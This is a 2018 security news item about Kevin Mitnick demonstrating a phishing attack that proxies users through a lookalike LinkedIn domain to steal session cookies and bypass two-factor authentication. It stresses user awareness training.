Hacker beats two-factor authentication with phishing attack

2018-05-10 16:24 by Daniela

Security researcher Kevin Mitnick has developed a social engineering attack to bypass two-factor authentication. Two-factor authentication (2FA) is an extra layer of security that requires something an employee HAS and something they KNOW. For instance, a combination password/username as well as something that only the user has like a code that was sent to them or they pulled from an app on their phone.

This particular new attack is based on proxying the user through the attacker's system with a credentials phish that uses a typo-squatting domain. Once the user falls for this social engineering tactic and enters their credentials, their authenticated session cookie gets intercepted and it is trivial to hack into the account.

Mitnick produced a video on YouTube showing how the exploit works by sending victims to a fake login page. For the demo, he used a fake LinkedIn page.

The website looks just like the Linkedin login page, but is on the llnked.com domain. This is a point at which a suspicious user will stop, but most are just eager to get on to the site. So they fill in the details and click Sign in. That triggers the 2FA check, which when the right code is entered, creates a session cookie allowing secure access to the site.

What Mitnick is attempting to show here is, even with 2FA, the user is the weak link. If they don't take the time to check where they are entering their secure information, no user-dependent security, however strong, is going to work.

"A white hat hacker friend of Kevin's developed a tool to bypass two-factor authentication using social engineering tactics – and it can be weaponized for any site," said Stu Sjouwerman, CEO, KnowBe4. "Two-factor authentication is intended to be an extra layer of security, but in this instance, we clearly see that you can't rely on it alone to protect your organization. This highlights the need for new-school security awareness training and simulated phishing because people are truly your last line of defense."